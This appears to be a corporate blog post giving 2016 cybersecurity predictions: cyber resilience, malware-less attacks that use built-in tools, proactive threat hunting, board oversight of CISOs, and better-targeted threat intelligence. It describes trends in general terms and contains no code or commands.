2015 was the year of hard truths. The notion of a “magic bullet” solution to prevent cyber-attacks became dangerously idealistic. We saw high profile breaches that touched nearly every industry—giving many organizations more concern about their own state of vulnerability. The “Internet of Things” brought consumer’s innumerable new conveniences—from their homes, cars, toys and even their medical devices—but it added another layer of risk for the producers of such connectivity. The common refrain, “it’s when, not if you’ll be hacked” became accepted fact. Organizational leadership started to understand that the technological arms race between the hackers and the defenders is a series of battles in a chronic war, without any impending rest for the battle-weary.
These realizations may sound bleak. But the resulting urgency for an effective cyber defense has brought to the fore a refreshingly realistic outlook. Organizations are now beginning to strive for cyber resiliency instead of invincibility, knowing they can persevere in the face of compromise. The mantra for 2016 is all about optimizing your security posture: understanding and prioritizing a company’s unique set of risks, acknowledging vulnerabilities where they exist, and mitigating against those risks when they are identified.
To this end, I’ve compiled a short list of trends every organization should be aware of this year:
- Malware and Malware-less hacks will continue to thwart traditional detection tactics. You don’t know what you don’t know. Truer words were never spoken. Last year showed us that sophisticated hackers have evolved their techniques and malware tactics with many no longer even deploying malware to move around your undetected network and exfiltrate data. And this year they will continue to up their malware game and also use legitimate tools already in your system, like Powershell scripts and Microsoft diagnostic tools. These tactics circumvent traditional malware-based detection systems, making these ubiquitous tools wholly ineffectual against these type of hacks. Not surprisingly, detection requires responders who know where to look and what to look for through deep dives into networks, revealing the tell-tale patterns of anomalous activity.
- Resilient-minded companies will proactively go on the hunt. Resilient organizations cannot wait to be notified about a breach of their own systems, and this year those most aware of their risk posture will begin investing in the proactive hunt for their adversaries. These “attack trackers” (internal or external experts) will know where to look for intruders in the dark corners of any network and will be able to recognize the subtle signs of compromise, industry by industry, whether malware is present or not.
- Board expectation of a CIO/CISOs positive performance will necessitate admitting vulnerability. 2015 found boards feeling uneasy with a “too rosy” security picture their CISO was painting—and they brought in third parties to conduct independent assessments as a result. In 2016, boards will continue to push IT leadership to tell the full truth about risk even if it means admitting vulnerabilities and managing the expectation of invincibility. Boards will also continue their quest for knowledge to ensure they are well-informed and comfortable making cyber risk decisions in the New Year. This can include the appointment of specialist, non-executive Cyber Directors and the formation of dedicated cyber risk committees (similar to audit committees), with independent subject matter experts as advisors. Regulators are also getting in on the action—with legislation already being introduced by the U.S. Senate, which if passed, would require public companies to disclose cyber experts on their board.
- By customer demand, threat intelligence gets more intelligent. Two to three years ago, businesses were clamoring for more threat information. By 2015, they had too much of it—with too many threat alerts streaming in from their collection of information sharing arrangements and threat intelligence services, making the alerts themselves pointless. And they were bogged down with too many threat vendors selling value-less feeds. 2016 will be the year of contextualized, risk-based threat information that’s meaningful and actionable.
These are just a handful of the need-to-know trends that IT professionals—from CIOs and CISOs to everyone in between—must be aware of when considering their cyber resilience posture in 2016. But, perhaps, shifting towards a resilience mindset and that ensuing action is the greatest trend we can expect next year. After all, to win a battle in the chronic cyber war requires not only a good defense, but the best possible offense.
CLICK HERE TO SEE AN INTERACTIVE INFOGRAPHIC of our 2016 Cyber Predictions, featuring the top six trends that will be making an impact within the next 12 months.